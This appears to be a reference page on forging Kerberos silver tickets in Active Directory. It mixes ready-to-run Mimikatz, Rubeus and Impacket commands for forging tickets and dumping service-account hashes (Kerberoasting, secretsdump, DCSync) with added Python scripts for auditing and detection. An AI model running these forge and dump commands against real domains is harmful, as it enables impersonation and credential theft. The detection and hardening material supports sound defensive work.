
Overview

Forge a TGS (service ticket) for one specific service using that service account's NTLM hash. Unlike a Golden Ticket, no DC contact is needed, which makes it harder to detect; the forged ticket is limited to a single service.

Requirements

  • Service account NTLM hash
  • Domain SID
  • Target SPN
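Every requirement above starts from the service account's key, so the defensive counterpart is an audit of which SPN-bearing accounts still expose an NTLM-equivalent key. The script below is an added example, not tooling from this page: it checks constructed records shaped like the LDAP attributes of service accounts (msDS-SupportedEncryptionTypes, pwdLastSet, adminCount, objectClass) for RC4 exposure, stale passwords, privilege and gMSA status. The account names, the 180-day threshold and the fixed "now" are assumptions; in production the records would come from an LDAP search for (servicePrincipalName=*).

```python
"""Audit AD service accounts for the exposure a silver ticket relies on.

Added example for this page, not tooling from the page. The records below
are constructed to mirror the LDAP attributes of accounts that carry an SPN;
names, dates and the policy threshold are assumptions.
"""
from __future__ import annotations

from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags
RC4_HMAC = 0x4
AES128_CTS = 0x8
AES256_CTS = 0x10

MAX_PASSWORD_AGE = timedelta(days=180)            # assumed policy threshold
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)   # fixed "now" for reproducible output
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> int:
    """Windows FILETIME: 100-ns ticks since 1601-01-01 UTC (pwdLastSet uses this)."""
    return int((dt - _FILETIME_EPOCH).total_seconds() * 10_000_000)


def from_filetime(ft: int) -> datetime:
    """Inverse of to_filetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=ft // 10)


# Constructed sample records (not real accounts)
SAMPLE_ACCOUNTS = [
    {   # classic target: attribute unset (RC4 fallback), old password, privileged
        "sAMAccountName": "svc_sql",
        "objectClass": ["user"],
        "servicePrincipalName": ["MSSQLSvc/sql.domain.local:1433"],
        "msDS-SupportedEncryptionTypes": None,
        "pwdLastSet": to_filetime(NOW - timedelta(days=900)),
        "adminCount": 1,
    },
    {   # hardened: AES only, rotated recently, unprivileged
        "sAMAccountName": "svc_web",
        "objectClass": ["user"],
        "servicePrincipalName": ["http/web.domain.local"],
        "msDS-SupportedEncryptionTypes": AES128_CTS | AES256_CTS,
        "pwdLastSet": to_filetime(NOW - timedelta(days=30)),
        "adminCount": 0,
    },
    {   # gMSA: long random password rotated automatically by the DC
        "sAMAccountName": "gmsa_app$",
        "objectClass": ["user", "computer", "msDS-GroupManagedServiceAccount"],
        "servicePrincipalName": ["http/app.domain.local"],
        "msDS-SupportedEncryptionTypes": AES256_CTS,
        "pwdLastSet": to_filetime(NOW - timedelta(days=10)),
        "adminCount": 0,
    },
]


def audit_service_account(rec: dict, now: datetime = NOW) -> list[str]:
    """Return the findings for one SPN-bearing account (empty list = nothing to flag)."""
    findings: list[str] = []
    if "msDS-GroupManagedServiceAccount" in rec.get("objectClass", []):
        return findings  # gMSA: password is random and rotated by the DC
    enc = rec.get("msDS-SupportedEncryptionTypes")
    if enc is None:
        # Absent attribute: the KDC falls back to its default, historically RC4.
        findings.append("msDS-SupportedEncryptionTypes unset (RC4 likely in use)")
    elif enc & RC4_HMAC:
        # With RC4 the service key is the NTLM hash, exactly what the forge commands take.
        findings.append("RC4 enabled: service key equals the NTLM hash")
    if enc is not None and not enc & (AES128_CTS | AES256_CTS):
        findings.append("no AES encryption type configured")
    age = now - from_filetime(rec["pwdLastSet"])
    if age > MAX_PASSWORD_AGE:
        findings.append(f"password last set {age.days} days ago")
    if rec.get("adminCount") == 1:
        findings.append("privileged account (adminCount=1)")
    return findings


def run_audit(records=SAMPLE_ACCOUNTS, now: datetime = NOW) -> dict[str, list[str]]:
    """Map each account with findings to its list of findings."""
    result: dict[str, list[str]] = {}
    for rec in records:
        findings = audit_service_account(rec, now)
        if findings:
            result[rec["sAMAccountName"]] = findings
    return result


if __name__ == "__main__":
    for name, findings in run_audit().items():
        print(name)
        for f in findings:
            print("  -", f)
```

Only svc_sql is reported: the unset encryption-type attribute, the 900-day-old password and adminCount=1 each turn up as separate findings, while the AES-only account and the gMSA produce none. Moving service accounts to gMSA or to AES-only keys with rotated passwords removes the RC4 key that the forge commands in the next sections consume.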

Common SPNs

Service       SPN Format
CIFS (SMB)    cifs/target.domain.local
HTTP          http/target.domain.local
MSSQL         MSSQLSvc/target.domain.local:1433
HOST          host/target.domain.local
LDAP          ldap/dc.domain.local
WSMAN         wsman/target.domain.local

Forge — Mimikatz

mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /target:target.domain.local /service:cifs /rc4:SERVICE_NTLM_HASH /ptt

MSSQL

mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /target:sql.domain.local /service:MSSQLSvc /rc4:SVC_HASH /ptt

Forge — Impacket

impacket-ticketer -nthash SERVICE_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local -spn cifs/target.domain.local Administrator

Use

export KRB5CCNAME=Administrator.ccache
impacket-smbclient domain.local/Administrator@target.domain.local -k -no-pass

Forge — Rubeus

.\Rubeus.exe silver /service:cifs/target.domain.local /rc4:SERVICE_HASH /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /ptt

Get Service Account Hash

# Kerberoasting
impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC -request

# From compromised host (local admin)
impacket-secretsdump user:pass@TARGET

# DCSync (if DA)
impacket-secretsdump DOMAIN/admin:pass@DC -just-dc-user svc_account
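The Kerberoasting step above is the one that does leave a trace on the DC: each requested service ticket is a 4769 event, and a roasting run shows up as one account requesting RC4 (0x17) tickets for many distinct service accounts in a short window. The script below is an added example, not part of the page or of Impacket: it runs that logic over constructed 4769 records encoded as JSON lines (field names follow the Windows event schema; the account names, addresses, the 5-minute window and the threshold of 5 SPNs are assumptions to tune per environment).

```python
"""Flag Kerberoasting-style bursts in DC Security log event 4769.

Added example, not from the page. The event lines are constructed JSON in the
shape of 4769 fields; users, services, IPs and thresholds are assumptions.
"""
from __future__ import annotations

import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"               # TicketEncryptionType value for RC4-HMAC
WINDOW = timedelta(minutes=5)   # assumed detection window
MIN_DISTINCT_SPNS = 5           # assumed threshold of distinct service accounts


def _ev(ts: str, user: str, service: str, enc: str, ip: str) -> str:
    """Build one constructed 4769 record as a JSON line."""
    return json.dumps({"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
                       "ServiceName": service, "TicketEncryptionType": enc,
                       "IpAddress": ip})


# Constructed sample log: one roasting burst, some normal traffic, one legacy client
SAMPLE_LOG = [
    _ev("2024-06-01T09:00:01", "jdoe@DOMAIN.LOCAL", "svc_sql", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:00:02", "jdoe@DOMAIN.LOCAL", "svc_web", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:00:03", "jdoe@DOMAIN.LOCAL", "svc_backup", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:00:04", "jdoe@DOMAIN.LOCAL", "svc_mon", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:00:05", "jdoe@DOMAIN.LOCAL", "svc_sched", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:00:06", "jdoe@DOMAIN.LOCAL", "svc_report", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:00:07", "jdoe@DOMAIN.LOCAL", "FS01$", "0x17", "10.0.0.50"),
    _ev("2024-06-01T09:30:00", "asmith@DOMAIN.LOCAL", "FS01$", "0x12", "10.0.0.77"),
    _ev("2024-06-01T09:31:00", "asmith@DOMAIN.LOCAL", "svc_web", "0x12", "10.0.0.77"),
    _ev("2024-06-01T10:00:00", "bob@DOMAIN.LOCAL", "svc_sql", "0x17", "10.0.0.91"),
]


def parse_4769(line: str) -> dict | None:
    """Parse one JSON line; return None for anything that is not a 4769."""
    e = json.loads(line)
    if e.get("EventID") != 4769:
        return None
    e["TimeCreated"] = datetime.fromisoformat(e["TimeCreated"])
    return e


def is_roastable_request(e: dict) -> bool:
    """RC4 ticket for a user service account (machine accounts and krbtgt excluded)."""
    svc = e["ServiceName"]
    return (e["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoast(lines, window: timedelta = WINDOW,
                      min_spns: int = MIN_DISTINCT_SPNS) -> list[dict]:
    """One alert per requesting account whose busiest window reaches min_spns."""
    per_user: dict[str, list[dict]] = defaultdict(list)
    for line in lines:
        e = parse_4769(line)
        if e and is_roastable_request(e):
            per_user[e["TargetUserName"].lower()].append(e)

    alerts = []
    for user, events in per_user.items():
        events.sort(key=lambda e: e["TimeCreated"])
        best = None  # (distinct services, start index, end index) of the widest window
        start = 0
        for end in range(len(events)):
            while events[end]["TimeCreated"] - events[start]["TimeCreated"] > window:
                start += 1
            spns = {x["ServiceName"].lower() for x in events[start:end + 1]}
            if best is None or len(spns) > len(best[0]):
                best = (spns, start, end)
        if best and len(best[0]) >= min_spns:
            alerts.append({"user": user,
                           "source_ip": events[best[2]]["IpAddress"],
                           "distinct_services": sorted(best[0]),
                           "first": events[best[1]]["TimeCreated"],
                           "last": events[best[2]]["TimeCreated"]})
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_LOG):
        print(f"{a['user']} from {a['source_ip']} requested {len(a['distinct_services'])} "
              f"RC4 service tickets between {a['first']} and {a['last']}: "
              f"{', '.join(a['distinct_services'])}")
```

jdoe's six RC4 requests trigger the alert; the FS01$ request is dropped because machine-account SPNs have random passwords and are not what a roasting run is after, asmith's AES (0x12) requests never count, and bob's single RC4 request stays under the threshold. In an environment where AES-only service accounts are the norm, any 0x17 ticket for a user account is itself worth reviewing.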

Notes

  • No DC contact, so harder to detect: the DC logs no TGS request (4769) for the forged ticket, so the only evidence is on the service host itself
  • Forged for a single service only
  • Machine account hash works for CIFS/HOST
  • Can set any user and any groups in the PAC
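Because the forged ticket never passes through the KDC, the service host records a Kerberos network logon (4624, LogonType 3) that has no corresponding 4769 on any DC. The script below is an added example, not from the page: it correlates constructed 4624 records from a file server with constructed 4769 records from the DC and flags logons with no TGS request inside the ticket lifetime, plus logons whose TargetUserSid disagrees with a directory snapshot. Host names, accounts, SIDs, the 10-hour lifetime and the JSON shape (field names follow the Windows event schema) are all assumptions.

```python
"""Correlate service-host 4624 Kerberos logons with DC 4769 TGS requests.

Added example, not from the page. Events are constructed JSON records from
two hosts ("DC01" and "FS01"); names, SIDs and the lifetime are assumptions.
"""
from __future__ import annotations

import json
from datetime import datetime, timedelta

MAX_TICKET_AGE = timedelta(hours=10)   # assumed: default maximum service ticket lifetime

# Constructed directory snapshot: sAMAccountName (lower case) -> objectSid
KNOWN_SIDS = {
    "alice": "S-1-5-21-1111-2222-3333-1105",
    "administrator": "S-1-5-21-1111-2222-3333-500",
}

NO_TGS = "no matching 4769 on the DC within ticket lifetime"
UNKNOWN_ACCOUNT = "account not in directory"
SID_MISMATCH = "TargetUserSid does not match directory"


def _dc(ts: str, user: str, service: str) -> str:
    """Constructed 4769 (TGS request) as logged on the DC."""
    return json.dumps({"Host": "DC01", "EventID": 4769, "TimeCreated": ts,
                       "TargetUserName": user, "ServiceName": service})


def _srv(host: str, ts: str, user: str, sid: str) -> str:
    """Constructed 4624 network logon via Kerberos as logged on the service host."""
    return json.dumps({"Host": host, "EventID": 4624, "TimeCreated": ts,
                       "TargetUserName": user, "TargetUserSid": sid, "LogonType": 3,
                       "AuthenticationPackageName": "Kerberos",
                       "TargetDomainName": "DOMAIN"})


SAMPLE_EVENTS = [
    _dc("2024-06-01T09:00:00", "alice@DOMAIN.LOCAL", "FS01$"),                  # TGS for cifs/fs01
    _srv("FS01", "2024-06-01T09:00:05", "alice", KNOWN_SIDS["alice"]),           # legitimate
    _srv("FS01", "2024-06-01T11:00:00", "Administrator",
         KNOWN_SIDS["administrator"]),                                          # no 4769 anywhere
    _srv("FS01", "2024-06-01T11:05:00", "alice", "S-1-5-21-1111-2222-3333-500"),  # SID inconsistent
]


def _bare_user(name: str) -> str:
    """Strip realm/domain decoration: 'alice@DOMAIN.LOCAL', 'DOMAIN\\alice' -> 'alice'."""
    return name.split("@")[0].split("\\")[-1].lower()


def detect_silver_tickets(lines, known_sids=KNOWN_SIDS,
                          max_age: timedelta = MAX_TICKET_AGE) -> list[dict]:
    """Return one alert per suspicious Kerberos network logon on a service host."""
    events = [json.loads(line) for line in lines]
    for e in events:
        e["TimeCreated"] = datetime.fromisoformat(e["TimeCreated"])
    tgs_requests = [e for e in events if e["EventID"] == 4769]

    alerts = []
    for e in events:
        if (e["EventID"] != 4624 or e.get("LogonType") != 3
                or e.get("AuthenticationPackageName") != "Kerberos"):
            continue
        user = _bare_user(e["TargetUserName"])
        host_account = e["Host"].lower() + "$"   # 4769 ServiceName for tickets to this host
        reasons = []

        # A genuine service ticket was issued by a DC at most max_age before the logon.
        matched = any(
            _bare_user(t["TargetUserName"]) == user
            and t["ServiceName"].lower() == host_account
            and timedelta(0) <= e["TimeCreated"] - t["TimeCreated"] <= max_age
            for t in tgs_requests)
        if not matched:
            reasons.append(NO_TGS)

        # Secondary check: the SID the host resolved from the PAC must match the directory.
        expected = known_sids.get(user)
        if expected is None:
            reasons.append(UNKNOWN_ACCOUNT)
        elif expected != e["TargetUserSid"]:
            reasons.append(SID_MISMATCH)

        if reasons:
            alerts.append({"host": e["Host"], "user": user,
                           "time": e["TimeCreated"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_silver_tickets(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']} logon as {a['user']}: {'; '.join(a['reasons'])}")
```

Two alerts come out: the Administrator logon at 11:00 has no 4769 behind it, and the second alice logon carries a SID the directory does not associate with that name. The correlation needs 4769 from every DC plus forwarded 4624 from the member servers, and tickets are cached and reused, so the lifetime window must cover renewals; the missing-4769 condition is the primary signal, and the name/SID consistency check is a secondary one. Enabling PAC validation on the service host closes the gap at the source rather than in the logs.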

Quick Reference

Task          Command
Forge CIFS    kerberos::golden /service:cifs /rc4:HASH /ptt
Impacket      impacket-ticketer -nthash HASH -spn cifs/target Admin
Use           export KRB5CCNAME=Admin.ccache, then -k -no-pass